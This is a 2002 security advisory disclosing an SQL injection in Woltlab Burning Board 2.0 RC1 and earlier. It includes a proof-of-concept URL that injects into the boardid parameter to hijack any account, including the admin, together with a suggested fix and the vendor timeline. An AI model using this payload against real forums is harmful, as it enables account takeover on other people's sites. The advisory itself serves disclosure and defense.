Subject: sql injection vulnerability in WBB 2.0 RC1 and below Date: Sep 8 2002 1:56PM Author: Cano2 Hi, I discovered a serious vulnerability in Woltlab Burning Board 2.0 RC 1 and below some weeks ago. The latest version (WBB 2.0 RC 2) seems not vulnerable, but there are still sites using vulnerable versiones. [versions tested vulnerable] WBB 2.0 RC 1 WBB 2.0 beta 5 WBB 2.0 beta 4 WBB 2.0 beta 3 [description] It allows any user (even guests, may depend on configuration) to compromise every other account (Administrator one's too). It's caused by a variable containing unchecked userinput in board.php, which can be used for a sql injection attack. The query looks similar to the following: UPDATE LOW_PRIORITY bb1_sessions SET lastactivity = 'xxx', request_uri = '$HTTP_REQUEST_URI'', boardid = '$boardid', threadid = 'xx' WHERE hash = '$sid' Because the content of $boardid is not checked, it's possible to overwrite othe fields in the table. [proof of concept] board.php?boardid=[boardid]%27,%20userid=%27[victims userid, 1 is usually an admin]&sid=[attackers session-id] The executed query now looks like that: UPDATE LOW_PRIORITY bb1_sessions SET lastactivity = 'xxx', request_uri = 'board.php?boardid=[boardid]%27,%20userid=%27[gewünschte userid, 1 ist i.d.R immer admin]&sid=[session-id]', boardid = '[boardid]' userid='[gewünschte userid, 1 ist i.d.R immer admin]', threadid = 'xx' WHERE hash = '$sid' As you can see, the userid of the attackers session is overwritten with the victim one's. [solution] Update to the latest Version (WBB 2.0 RC2) or check every variable possibly containing userinput. p.e. $boardid = mysql_escape_string($boardid); [vendor status] 29.7.02 contacted Woltlab 12.8.02 release of WBB 2.0 RC 2 (seems not vulnerable) I did't get an answer from Woltlab until now.